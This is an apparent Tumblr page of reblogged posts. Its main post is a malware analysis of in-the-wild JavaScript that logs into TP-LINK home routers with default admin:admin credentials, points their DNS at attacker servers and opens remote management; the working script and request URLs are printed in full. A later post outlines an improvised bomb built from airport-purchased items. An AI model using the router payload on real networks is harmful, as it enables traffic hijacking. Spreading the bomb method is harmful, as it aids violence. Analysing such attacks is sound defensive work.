two-factor authentication is really cool, and it’s really great that tumblr is implementing it. You all should use it. 

Comments
Comments
Comments
Comments
Comments
Comments
Comments

Attacking home routers via JavaScript

kapravel:

We have recently noticed submissions on Wepawet that try to access local IP addresses. This is of particular interest since the attacker’s intention is to tamper with the configuration of the victim’s home router

A live example is located at http://freemdsv.com/ad.php?pid=20120811

if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style=\'display:none\'>");

    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');

    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}

The script basically checks to see if the router is accessible through an image request to:

http://admin:admin@192.168.1.1/images/logo.jpg

So it expects that the router is left in the default configuration with username/password as admin:admin and that it is accessible from the IP address 192.168.1.1. The functions ip1 and ip3 are responsible for the malicious reconfiguration of the router with the following requests:

http ://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced

and

http ://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8

The file “PPPoECfgAdvRpm.htm” seems to be the configuration of PPPoE Advanced Settings for TP-LINK routers (link). It is very interesting that they change the victim’s DNS servers to 58.221.59.217 and 114.114.114.114, which means that the victim is susceptible to Man-in-the-middle attacks.

image

The second request reconfigures the router to be remotely accessible through it’s web interface (link). This way the attacker can remotely change the settings of the victim’s router at its will.

A few reports from Wepawet that perform such attacks are here:

Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report
Wepawet report

If you see any related scripts in the wild or you have information what the DNS servers are targeting feel free to contact me on twitter: @kapravel

Comments

Guy Builds Bomb Using Only Items Bought After Airport Security

Using only a stainless steel coffee mug, a Li-ion AA battery, along with some Axe Body Spray, a condom, and a bottle of water, this anarchistic MacGyver was able to build and successfully detonate an improvised bomb. 

It works by the water filled condom breaking upon impact of the devise being thrown. This shorts the battery, creating heat that ignites the can of Axe body spray. It isn’t likely going to bring down a plane but it the shrapnel one could pack into such a devise could make for a legitimate terror concern.

Comments
Comments
Comments
Comments
Comments
Comments

This theme is based on a template designed by manasto jones, and is powered by tumblr